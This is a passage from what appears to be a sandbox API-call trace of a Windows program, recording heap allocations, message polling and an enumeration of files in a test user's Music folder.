Size=0x4) returned 0x2a71a18 [0205.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa270 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0205.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0205.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa468 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0205.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0205.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0205.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0205.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0205.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0205.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0205.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0205.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0205.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0205.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0205.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0205.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0205.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0205.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0205.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0205.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0205.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0205.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0205.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0205.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0205.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0205.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0205.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0205.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0205.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0205.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa240 [0205.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0205.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0205.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0205.544] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0205.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0205.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0205.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0205.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0205.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0205.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0205.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0205.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0205.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0205.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0205.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0205.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0205.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0205.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0205.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0205.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0205.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0205.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0205.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9) returned 0x2aaa828 [0205.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x2aaa828, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 [0205.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0205.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x52) returned 0x2a5fa80 [0205.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa558 [0205.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Music", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0205.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f7060 [0205.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Music", cchWideChar=22, lpMultiByteStr=0x29f7060, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy\\Music", lpUsedDefaultChar=0x0) returned 22 [0205.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0205.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0205.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0205.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2c) returned 0x2a73648 [0205.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0205.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0205.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0205.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0205.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0205.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0205.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0205.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0205.551] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2a77b20, cbMultiByte=22, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0205.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2c) returned 0x2a73338 [0205.551] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2a77b20, cbMultiByte=22, lpWideCharStr=0x2a73338, cchWideChar=22 | out: lpWideCharStr="C:\\Users\\FD1HVy\\Music") returned 22 [0205.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0205.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73808 [0205.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73338 | out: hHeap=0x2af0000) returned 1 [0205.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0205.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0205.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0205.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0205.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0205.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a750d0 [0205.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0205.552] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0205.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0205.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0205.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0205.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0205.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0205.552] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0205.579] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0205.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0205.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0205.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0205.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0205.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x29f6fe0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", lpUsedDefaultChar=0x0) returned 23 [0205.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0205.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x2a71a78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*.*", lpUsedDefaultChar=0x0) returned 4 [0205.584] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.584] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.584] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\*.*", lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3a0a9f9f, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3a0a9f9f, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName=".", cAlternateFileName="")) returned 0x9e1db8 [0205.614] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3a0a9f9f, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3a0a9f9f, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName="..", cAlternateFileName="")) returned 1 [0205.614] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4409f518, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4409f518, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0205.614] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.615] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.616] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.616] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.616] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.617] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.617] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.617] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.617] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf53dd50, ftCreationTime.dwHighDateTime=0x1d5c9ae, ftLastAccessTime.dwLowDateTime=0x62440750, ftLastAccessTime.dwHighDateTime=0x1d5cd9e, ftLastWriteTime.dwLowDateTime=0x62440750, ftLastWriteTime.dwHighDateTime=0x1d5cd9e, nFileSizeHigh=0x0, nFileSizeLow=0xce48, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="E6IDgLQGE97MYwh0a.wav", cAlternateFileName="E6IDGL~1.WAV")) returned 1 [0205.617] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.617] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.617] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.617] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.617] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.617] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefc63ec0, ftCreationTime.dwHighDateTime=0x1d5d4df, ftLastAccessTime.dwLowDateTime=0x3e509020, ftLastAccessTime.dwHighDateTime=0x1d5cb5a, ftLastWriteTime.dwLowDateTime=0x3e509020, ftLastWriteTime.dwHighDateTime=0x1d5cb5a, nFileSizeHigh=0x0, nFileSizeLow=0xe7e3, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="erIdlI.wav", cAlternateFileName="")) returned 1 [0205.617] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.617] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.617] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.617] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.617] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.617] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11e87710, ftCreationTime.dwHighDateTime=0x1d5cc5d, ftLastAccessTime.dwLowDateTime=0xea01f5d0, ftLastAccessTime.dwHighDateTime=0x1d5c93e, ftLastWriteTime.dwLowDateTime=0xea01f5d0, ftLastWriteTime.dwHighDateTime=0x1d5c93e, nFileSizeHigh=0x0, nFileSizeLow=0x10c08, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="JlLewkGtdwovoI.mp3", cAlternateFileName="JLLEWK~1.MP3")) returned 1 [0205.617] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.617] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.617] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.617] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.617] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.617] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b56c6e0, ftCreationTime.dwHighDateTime=0x1d5ccdb, ftLastAccessTime.dwLowDateTime=0xc000e480, ftLastAccessTime.dwHighDateTime=0x1d5d46f, ftLastWriteTime.dwLowDateTime=0xc000e480, ftLastWriteTime.dwHighDateTime=0x1d5d46f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="LWx-lTCW5BQnV", cAlternateFileName="LWX-LT~1")) returned 1 [0205.618] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.618] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.618] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.618] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.618] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.618] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29e34850, ftCreationTime.dwHighDateTime=0x1d5d080, ftLastAccessTime.dwLowDateTime=0x34635a50, ftLastAccessTime.dwHighDateTime=0x1d5cf99, ftLastWriteTime.dwLowDateTime=0x34635a50, ftLastWriteTime.dwHighDateTime=0x1d5cf99, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="orL7CLboBO", cAlternateFileName="ORL7CL~1")) returned 1 [0205.618] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.618] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.618] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.618] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.618] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.618] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5adf7910, ftCreationTime.dwHighDateTime=0x1d5c996, ftLastAccessTime.dwLowDateTime=0xc986ec50, ftLastAccessTime.dwHighDateTime=0x1d5c896, ftLastWriteTime.dwLowDateTime=0xc986ec50, ftLastWriteTime.dwHighDateTime=0x1d5c896, nFileSizeHigh=0x0, nFileSizeLow=0x11605, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="pFAB.wav", cAlternateFileName="")) returned 1 [0205.618] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.618] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0205.618] 